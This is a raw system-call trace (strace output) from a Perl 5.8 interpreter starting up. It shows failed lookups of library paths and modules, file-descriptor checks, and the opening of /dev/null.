10712 07:34:16.936192 stat64("/usr/local/lib/perl/5.8.4", 0xbfbe8e90) = -1 ENOENT (No such file or directory)

10712 07:34:16.936203 stat64("/usr/local/share/perl/5.8.4", 0xbfbe8e90) = -1 ENOENT (No such file or directory)

10712 07:34:16.936214 stat64("/usr/local/lib/perl/5.8.3", 0xbfbe8e90) = -1 ENOENT (No such file or directory)

10712 07:34:16.936225 stat64("/usr/local/share/perl/5.8.3", 0xbfbe8e90) = -1 ENOENT (No such file or directory)

10712 07:34:16.936237 stat64("/usr/local/lib/perl/5.8.2", 0xbfbe8e90) = -1 ENOENT (No such file or directory)

10712 07:34:16.936248 stat64("/usr/local/share/perl/5.8.2", 0xbfbe8e90) = -1 ENOENT (No such file or directory)

10712 07:34:16.936260 stat64("/usr/local/lib/perl/5.8.1", 0xbfbe8e90) = -1 ENOENT (No such file or directory)

10712 07:34:16.936271 stat64("/usr/local/share/perl/5.8.1", 0xbfbe8e90) = -1 ENOENT (No such file or directory)

10712 07:34:16.936282 stat64("/usr/local/lib/perl/5.8.0", 0xbfbe8e90) = -1 ENOENT (No such file or directory)

10712 07:34:16.936294 stat64("/usr/local/share/perl/5.8.0", 0xbfbe8e90) = -1 ENOENT (No such file or directory)

10712 07:34:16.936315 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfbe8b88) = -1 ENOTTY (Inappropriate ioctl for device)

10712 07:34:16.936329 _llseek(0, 0, [0], SEEK_CUR) = 0

10712 07:34:16.936341 ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfbe8b88) = -1 EBADF (Bad file descriptor)

10712 07:34:16.936351 _llseek(1, 0, 0xbfbe8bd0, SEEK_CUR) = -1 EBADF (Bad file descriptor)

10712 07:34:16.936361 ioctl(2, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfbe8b88) = -1 EINVAL (Invalid argument)

10712 07:34:16.936372 _llseek(2, 0, 0xbfbe8bd0, SEEK_CUR) = -1 ESPIPE (Illegal seek)

10712 07:34:16.936382 open("/dev/null", O_RDONLY|O_LARGEFILE) = 1

10712 07:34:16.936394 ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfbe8c48) = -1 ENOTTY (Inappropriate ioctl for device)

10712 07:34:16.936404 _llseek(1, 0, [0], SEEK_CUR) = 0

10712 07:34:16.936415 fcntl64(1, F_SETFD, FD_CLOEXEC) = 0

10712 07:34:16.936426 fstat64(1, {st_mode=S_IFCHR|0666, st_rdev=makedev(1, 3), ...}) = 0

10712 07:34:16.936455 rt_sigaction(SIGCHLD, NULL, {SIG_DFL}, 8) = 0

10712 07:34:16.936570 readlink("/proc/self/exe", "/usr/bin/perl", 4095) = 13

10712 07:34:16.936615 getppid()         = 10710

10712 07:34:16.936673 stat64("/etc/perl/IO.pmc", 0xbfbe893c) = -1 ENOENT (No such file or directory)

10712 07:34:16.936687 stat64("/etc/perl/IO.pm", 0xbfbe884c) = -1 ENOENT (No such file or directory)

10712 07:34:16.936703 stat64("/usr/local/lib/perl/5.8.8/IO.pmc", 0xbfbe893c) = -1 ENOENT (No such file or directory)

10712 07:34:16.936716 stat64("/usr/local/lib/perl/5.8.8/IO.pm", 0xbfbe884c) = -1 ENOENT (No such file or directory)

10712 07:34:16.936729 stat64("/usr/local/share/perl/5.8.8/IO.pmc", 0xbfbe893c) = -1 ENOENT (No such file or directory)

10712 07:34:16.936741 stat64("/usr/local/share/perl/5.8.8/IO.pm", 0xbfbe884c) = -1 ENOENT (No such file or directory)

